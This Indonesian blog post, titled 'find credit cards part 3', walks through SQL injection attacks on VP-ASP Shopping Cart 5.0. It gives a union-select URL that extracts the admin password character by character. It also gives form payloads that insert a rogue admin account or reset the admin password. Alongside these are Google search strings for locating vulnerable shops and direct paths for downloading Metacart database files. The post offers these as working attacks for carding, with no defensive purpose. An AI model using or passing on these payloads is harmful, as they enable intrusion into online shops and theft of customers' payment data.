Saturday, July 15, 2006

Cari CC Bagian 3

VP-ASP Shopping Cart 5.0

SQL Injection vulnerability pada script 'shopdisplayproducts.asp'
keyword allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
http://.../vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--
Ganti²lah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--
dst...
Naah.. kalau berhasil, kita akan mendapatkan informasi username dan password admin!
Untuk login admin ke http://.../vpasp/shopadmin.asp

VP-ASP Shopping Cart 5.0

SQL Injection vulnerability pada script 'shopsearch.asp
keyword allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru,
postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values ('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where fldusername=''--&SubCategory=All&action.x=33&action.y=6
jangan lupa untuk mengganti dan sesuai selera!:
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://.../vpasp/shopadmin.asp
Keywords di google: cart,METACART
Details Exploit :
Access langsung pada target url dimana letak
file database pada web tertentu yang di install metacart system.
RUMUS :
http://targetshop/database/metacart.mdb
http://Targetshop/metacart/database/metacart.mdb

No comments:

Copyleft © 2008. blog by default All rights reverted.